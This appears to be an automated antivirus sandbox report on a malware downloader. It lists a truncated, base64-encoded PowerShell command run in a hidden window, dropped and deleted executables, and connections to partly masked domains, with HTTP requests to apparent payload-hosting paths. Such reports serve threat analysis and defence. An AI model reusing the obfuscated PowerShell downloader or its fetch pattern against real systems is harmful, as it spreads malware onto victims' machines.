Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABRAGwAegB5AG0AYgBkAD0AKAAoACcATAA5ACcAKwAnADgAJwApACsAJwBwACcAKwAoACcAcwAnACsAJwBmADIAJwApACkAOwAmACgAJwBuAGUAdwAtAGkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABlAG4AdgA6AHUAUw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1436
Modifies file system
Creates the following files
- %TEMP%\783858.cvr
- %HOMEPATH%\o0ysj2n\n4wp4ij\evbeds9.exe
Deletes the following files
- %HOMEPATH%\o0ysj2n\n4wp4ij\evbeds9.exe
Network activity
Connects to
- 'm.##mec.com':80
- 'je#####rzeccardi.com':80
- 'hi##llo.com':80
- 'pa###tez.com':80
- 'ch###enbox.vn':80
- 'ch###enbox.vn':443
TCP
HTTP GET requests
- http://je#####rzeccardi.com/wp-includes/IKvdtgK9/
- http://pa###tez.com/wp-content/cRzpH/
- http://ch###enbox.vn/image/IYt/
Other
- 'ch###enbox.vn':443
UDP
- DNS ASK m.##mec.com
- DNS ASK aw####hyberhd.com
- DNS ASK je#####rzeccardi.com
- DNS ASK hi##llo.com
- DNS ASK uh#.com.pk
- DNS ASK pa###tez.com
- DNS ASK ch###enbox.vn
Miscellaneous
Executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABRAGwAegB5AG0AYgBkAD0AKAAoACcATAA5ACcAKwAnADgAJwApACsAJwBwACcAKwAoACcAcwAnACsAJwBmADIAJwApACkAOwAmACgAJwBuAGUAdwAtAGkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABlAG4AdgA6AHUAUw...' (with hidden window)
